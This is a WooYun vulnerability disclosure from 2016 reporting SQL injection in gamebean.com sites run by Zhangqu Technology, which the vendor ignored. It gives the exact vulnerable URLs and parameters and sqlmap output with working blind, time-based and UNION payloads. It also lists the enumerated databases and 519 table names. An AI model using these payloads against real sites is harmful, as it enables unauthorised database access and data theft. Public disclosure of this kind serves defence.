当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170856

漏洞标题:掌趣旗下多处sql注入

相关厂商:北京掌趣科技股份有限公司

漏洞作者: mango

提交时间:2016-01-18 15:30

修复时间:2016-01-23 15:40

公开时间:2016-01-23 15:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

2

详细说明:

http://game.gamebean.com/pdmodel_list.php?model=1&s=31&channel=A307

sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
---
Parameter: model (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: model=1 AND 1104=1104&s=31&channel=A307
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: model=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BKFW)&s=31&channel=A307
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: model=1 UNION ALL SELECT NULL,CONCAT(0x716b6b7a71,0x7a467477484b516e4b65,0x716a787171),NULL-- &s=31&channel=A307
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: model (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: model=1 AND 1104=1104&s=31&channel=A307
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: model=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BKFW)&s=31&channel=A307
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: model=1 UNION ALL SELECT NULL,CONCAT(0x716b6b7a71,0x7a467477484b516e4b65,0x716a787171),NULL-- &s=31&channel=A307
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] ssfee_platform
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: model (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: model=1 AND 1104=1104&s=31&channel=A307
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: model=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BKFW)&s=31&channel=A307
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: model=1 UNION ALL SELECT NULL,CONCAT(0x716b6b7a71,0x7a467477484b516e4b65,0x716a787171),NULL-- &s=31&channel=A307
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
Database: ssfee_platform
[519 tables]
+---------------------------------+
| ASDF |
| ASDF_copy |
| F_date |
| F_min |
| F_min_copy |
| F_set |
| F_t201002 |
| F_t20100225 |
| F_username |
| UA_ID_Z |
| UA_ID_Z_2 |
| UA_ID_Z_4 |
| UA_ID_Z_5 |
| 29fee |
| 3G_ji |
| 8001_power |
| 8002_power |
| 8003_power |
| use_wap_session_2010-01 |
| aa |
| ajax_admin |
| ajax_book |
| apur |
| apur_download |
| bbs_info |
| budata |
| budata_xjoys |
| c_Symbian |
| c_Symbian_copy |
| c_Symbian_copy1 |
| c_Symbian_copy2 |
| c_Symbian_copy3 |
| c_Symbian_copy4 |
| c_code |
| card_ass |
| cartoon_ass |
| categories |
| cc |
| channel_visit |
| channels |
| channels_state |
| channels_user |
| channels_user_2011 |
| channels_user_copy |
| channels_user_copy1 |
| channels_user_copy2 |
| channels_user_copy3 |
| channels_user_copy4 |
| channels_user_copy5 |
| channels_user_test |
| channels_wapinfo |
| chihot |
| chipang_list |
| chipang_termid |
| chipang_word |
| cmsgameinfo |
| cmsstat |
| conf_datas |
| consigns |
| cookword |
| cp_Management |
| cs |
| csj_trade |
| del_code |
| del_wid |
| distributes |
| do_game |
| do_user |
| dousou_user |
| downloadtermid |
| duandai_liliang |
| fee_kou_log |
| fee_logs |
| fee_logs_2008 |
| fee_logs_wap |
| fee_logs_xjoys |
| fee_logs_zysd |
| fee_methods |
| fee_nodes |
| flash_img |
| gadd_info |
| gadd_jf |
| gadd_jfd |
| gadd_jfd_20130131_del |
| gadd_jfd_service |
| game_gonglue |
| game_stat |
| game_stat_00 |
| game_stat_20091029 |
| game_stat_3he1 |
| game_stat_wap |
| game_zystat |
| goldberg_content_pages |
| goldberg_controller_actions |
| goldberg_markup_styles |
| goldberg_menu_items |
| goldberg_permissions |
| goldberg_roles |
| goldberg_roles_permissions |
| goldberg_site_controllers |
| goldberg_system_settings |
| goldberg_users |
| haoduan |
| haoduan_ds |
| huodong |
| image_ass |
| index_admin |
| jar_list |
| jz_check |
| kf_ |
| kf_sms |
| kq |
| m_box_fx_201002 |
| m_box_fx_201003 |
| m_box_fx_201004 |
| m_box_fx_201005 |
| m_box_fx_201006 |
| m_box_fx_201007 |
| m_box_fx_201008 |
| m_box_fx_201009 |
| m_box_fx_201010 |
| m_box_fx_201011 |
| m_box_fx_201012 |
| m_box_fx_201101 |
| m_box_fx_201102 |
| m_box_fx_201103 |
| m_box_fx_201104 |
| m_box_fx_201105 |
| m_box_fx_201106 |
| m_box_fx_201107 |
| m_box_fx_201108 |
| marketing |
| mms_entities |
| mms_entity_items |
| mms_push_schedule_item_logs |
| mms_push_schedule_items |
| mms_push_schedules |
| mms_resource_items |
| mms_resource_types |
| mms_resources |
| mobile |
| mobile_game_info |
| mobile_group_mobile |
| model_info |
| model_info_copy |
| mojie |
| mojie_code |
| mojieonlineid |
| mp3_ass |
| mp3_ass_swap |
| new_jf_dz |
| nokia_ji |
| online_code |
| p_ad |
| p_ad_copy |
| p_ad_copy1 |
| p_ad_info |
| p_admin |
| p_admin_57 |
| p_admin_zl |
| p_adver_admin |
| p_area |
| p_config |
| p_ip |
| p_newsbase |
| p_newsclass |
| p_newscontent |
| p_tj |
| p_user_ip |
| p_user_ip_are |
| play_ji |
| plugin_schema_info |
| power_ota |
| product_comment |
| product_substance |
| product_substance2 |
| productinfo |
| productinfo_wap |
| productinfo_xjoys |
| profession_info |
| ring_ass |
| rms_info |
| sanxing |
| sanxing_copy |
| sanxing_copy1 |
| sanxing_ji |
| sanxing_ji_copy |
| sanxing_ji_copy1 |
| sanxing_ji_copy2 |
| sanxing_ji_copy3 |
| sanxing_sx |
| sanxing_sxj |
| schema_info |
| school_word |
| sdong_ji |
| seach_name_waptype |
| seach_name_wapurl |
| seek_gateway_chengben |
| seek_gateway_chengben_tmp |
| seek_gateway_fee |
| seek_gateway_fee_tmp |
| seek_net_fee |
| seek_net_fee_2010 |
| seek_net_fee_tmp1 |
| seekdata |
| shop_cp |
| shop_dd |
| shop_dz |
| shop_gwc |
| shop_qd |
| shop_qd_copy |
| shop_qd_copy1 |
| shop_qd_copy2 |
| shop_qd_copy3 |
| shop_qd_h |
| shop_qd_h_s |
| shop_qd_test |
| shop_sp |
| sj_data |
| sms_checkinfo |
| sms_code |
| sms_code_20091217 |
| sms_code_copy |
| sms_code_copy1 |
| sms_fee1ting_logs |
| sms_fee_logs |
| sms_fee_logs_6501 |
| sms_fee_logs_jzmw |
| super_cplog_200907 |
| super_cplog_200908 |
| super_cplog_200909 |
| super_cplog_200910 |
| super_cplog_200911 |
| super_cplog_200912 |
| super_cplog_201001 |
| super_cplog_201002 |
| super_cplog_201003 |
| super_cplog_201004 |
| super_cplog_201005 |
| super_cplog_201006 |
| super_cplog_201007 |
| super_cplog_201008 |
| super_cplog_201009 |
| super_cplog_201010 |
| super_cplog_201011 |
| super_cplog_201012 |
| super_cplog_201101 |
| super_cplog_201102 |
| super_cplog_201103 |
| super_cplog_201104 |
| super_cplog_201105 |
| super_cplog_201106 |
| super_cplog_201107 |
| super_cplog_201108 |
| super_cplog_201109 |
| super_cplog_201110 |
| super_gstatlog_ |
| super_gstatlog_200910 |
| super_gstatlog_200911 |
| super_gstatlog_200911_tmp |
| super_gstatlog_200912 |
| super_gstatlog_201001 |
| super_gstatlog_201002 |
| super_gstatlog_201003 |
| super_gstatlog_201004 |
| super_gstatlog_201005 |
| super_gstatlog_201006 |
| super_gstatlog_201007 |
| super_gstatlog_201008 |
| super_gstatlog_201009 |
| super_gstatlog_201010 |
| super_gstatlog_201011 |
| super_gstatlog_201012 |
| super_gstatlog_201101 |
| super_gstatlog_201102 |
| super_gstatlog_201103 |
| super_gstatlog_201104 |
| super_gstatlog_201105 |
| super_gstatlog_201106 |
| super_gstatlog_201107 |
| super_gstatlog_201108 |
| super_gstatlog_201109 |
| super_gstatlog_201110 |
| super_statlog_00 |
| super_statlog_200901 |
| super_statlog_200902 |
| super_statlog_200903 |
| super_statlog_200904 |
| super_statlog_200905 |
| super_statlog_200906 |
| super_statlog_200907 |
| super_statlog_200908 |
| super_statlog_200909 |
| super_statlog_200910 |
| super_statlog_200911 |
| super_statlog_200912 |
| super_statlog_201001 |
| super_statlog_201002 |
| super_statlog_201003 |
| super_statlog_201003_copy |
| super_statlog_201004 |
| super_statlog_201005 |
| super_statlog_201005_cccc |
| super_statlog_201005_copy |
| super_statlog_201005_copy1 |
| super_statlog_201005_copy2 |
| super_statlog_201005_copy3_copy |
| super_statlog_201006 |
| super_statlog_201007 |
| super_statlog_2010079 |
| super_statlog_201008 |
| super_statlog_201009 |
| super_statlog_201010 |
| super_statlog_201010_copy |
| super_statlog_201010_copy_copy |
| super_statlog_201011 |
| super_statlog_201012 |
| super_statlog_201101 |
| super_statlog_201102 |
| super_statlog_201103 |
| super_statlog_201104 |
| super_statlog_201105 |
| super_statlog_201106 |
| super_statlog_201107 |
| super_statlog_201108 |
| super_statlog_201109 |
| super_statlog_201110 |
| super_statlog_ea_200901 |
| super_statlog_ea_200902 |
| super_statlog_ea_200903 |
| super_statlog_ea_200904 |
| super_statlog_ea_200905 |
| super_statlog_ea_200906 |
| super_statlog_ea_200907 |
| super_statlog_ea_200908 |
| super_statlog_ea_200909 |
| super_statlog_ea_200910 |
| super_statlog_ea_200911 |
| super_statlog_ea_200912 |
| super_statlog_ea_201001 |
| super_statlog_ea_201002 |
| super_statlog_ea_201003 |
| super_statlog_ea_201004 |
| super_statlog_ea_201005 |
| super_statlog_ea_201006 |
| super_statlog_ea_201007 |
| super_statlog_ea_201008 |
| super_statlog_ea_201009 |
| super_statlog_ea_201010 |
| super_statlog_ea_201011 |
| super_statlog_eatmp_200911 |
| super_statlog_eatmp_200912 |
| super_statlog_eatmp_201001 |
| super_statlog_eatmp_201002 |
| super_statlog_eatmp_201003 |
| super_statlog_eatmp_201004 |
| super_statlog_eatmp_201005 |
| super_statlog_eatmp_201006 |
| super_statlog_eatmp_201007 |
| super_statlog_eatmp_201008 |
| super_statlog_eatmp_201009 |
| super_statlog_eatmp_201010 |
| super_statlog_eatmp_201011 |
| super_statlog_eatmp_201012 |
| super_statlog_eatmp_201101 |
| super_statlog_eatmp_201102 |
| super_statlog_eatmp_201103 |
| super_statlog_eatmp_201104 |
| super_statlog_eatmp_201105 |
| super_statlog_eatmp_201106 |
| super_statlog_eatmp_201107 |
| super_statlog_eatmp_201108 |
| super_statlog_eatmp_201109 |
| super_statlog_eatmp_201110 |
| super_statlog_test_201005 |
| syncindex |
| syncindex_beiwei |
| syncindex_gadd |
| syncindex_netgame |
| syncindex_one |
| syncindex_xjoys |
| t |
| t1 |
| t200910 |
| t_1 |
| template_info |
| template_info2 |
| tempua |
| terminal_application_types |
| terminal_applications |
| terminal_applications2 |
| terminal_applications_copy |
| terminal_applications_copy1 |
| terminal_brands |
| terminal_items |
| terminal_resource_adapters |
| terminals |
| theme_ass |
| title_group |
| title_manage |
| tmp |
| tmpua |
| trend_channel |
| ua_lg |
| ua_tab |
| use_history_db |
| use_history_info |
| use_history_stat |
| use_history_useinfo |
| use_push_total |
| use_ua_stat |
| use_wap_down |
| use_wap_downactioon |
| use_wap_session |
| use_wap_view |
| vender |
| video_ass |
| w_num |
| wap_huodong |
| wap_name_cardtype |
| wap_name_cardtype_gengmingyu |
| wap_name_cardtype_liliang |
| wap_name_cardtype_panzhiwei |
| wap_name_cardtype_qiuxin |
| wap_name_cardtype_supei |
| wap_name_cardtype_wusheng |
| wap_name_cardtype_yichag |
| wap_name_cardtype_zhangheming |
| wap_name_cardurl |
| wap_name_cardurl_gengmingyu |
| wap_name_cardurl_liliang |
| wap_name_cardurl_panzhiwei |
| wap_name_cardurl_qiuxin |
| wap_name_cardurl_supei |
| wap_name_cardurl_wusheng |
| wap_name_cardurl_yichag |
| wap_name_cardurl_zhangheming |
| wap_name_cartoontype |
| wap_name_cartoonurl |
| wap_name_cartoonurl_copy |
| wap_name_cstype |
| wap_name_cstype_gengmingyu |
| wap_name_cstype_liliang |
| wap_name_cstype_panzhiwei |
| wap_name_cstype_qiuxin |
| wap_name_cstype_supei |
| wap_name_cstype_wusheng |
| wap_name_cstype_yichag |
| wap_name_cstype_zhangheming |
| wap_name_csurl |
| wap_name_csurl_copy_copy |
| wap_name_csurl_gengmingyu |
| wap_name_csurl_liliang |
| wap_name_csurl_panzhiwei |
| wap_name_csurl_qiuxin |
| wap_name_csurl_supei |
| wap_name_csurl_wusheng |
| wap_name_csurl_yichag |
| wap_name_csurl_zhangheming |
| wap_name_imagetype |
| wap_name_imageurl |
| wap_name_jxtype |
| wap_name_jxurl |
| wap_name_jxurl_z |
| wap_name_jxz |
| wap_name_keyword |
| wap_name_mp_s |
| wap_name_mptype |
| wap_name_mpurl |
| wap_name_playtype |
| wap_name_playurl |
| wap_name_themetype |
| wap_name_themeurl |
| wap_name_type |
| wap_name_type_j |
| wap_name_type_sq |
| wap_name_typezt1 |
| wap_name_typezt2 |
| wap_name_typezt3 |
| wap_name_typezt4 |
| wap_name_url |
| wap_name_url_j |
| wap_name_url_sq |
| wap_name_urlzt1 |
| wap_name_urlzt2 |
| wap_name_urlzt3 |
| wap_name_urlzt4 |
| wap_name_videotype |
| wap_name_videourl |
| wap_name_waptype |
| wap_name_waptype_copy1 |
| wap_name_wapurl |
| wap_name_wapurl_copy |
| wap_name_zt1type |
| wap_name_zt1url |
| wap_name_zt2type |
| wap_name_zt2url |
| wap_name_zt3type |
| wap_name_zt3url |
| wap_name_zt4type |
| wap_name_zt4url |
| wap_name_zt5type |
| wap_name_zt5url |
| wap_seek_info |
| wap_stat_type |
| wap_supermarket |
| wap_wtj |
| wap_zcsb_bean |
| wap_zcsb_play |
| wap_zcsb_tgwy |
| wap_zixun |
| z_d |
| z_ipone |
| z_ipone_1 |
| z_ipone_2 |
| z_ipone_3 |
| z_ipone_4 |
| z_ipone_b |
| z_ipone_z |
+---------------------------------+


漏洞证明:

http://long.gamebean.com/game_enter.php?s_id=1

sqlmap identified the following injection points with a total of 217 HTTP(s) requests:
---
Parameter: s_id (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: s_id=-3250' UNION ALL SELECT NULL,CONCAT(0x7162786a71,0x4762687879465a6b576f,0x717a6b7871)#
---
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: s_id (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: s_id=-3250' UNION ALL SELECT NULL,CONCAT(0x7162786a71,0x4762687879465a6b576f,0x717a6b7871)#
---
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5
available databases [25]:
[*] aa
[*] analyze
[*] android
[*] bbs
[*] cjsh_user
[*] cms
[*] dx
[*] football
[*] game_stat
[*] gcenter
[*] gs
[*] information_schema
[*] lt_wap
[*] mis
[*] mysql
[*] ourpalm
[*] ssfee_platform
[*] ssfee_platform_test
[*] test
[*] test_channel
[*] union
[*] user
[*] user2406
[*] webpay
[*] yjws

修复方案:

版权声明:转载请注明来源 mango@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-23 15:40

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价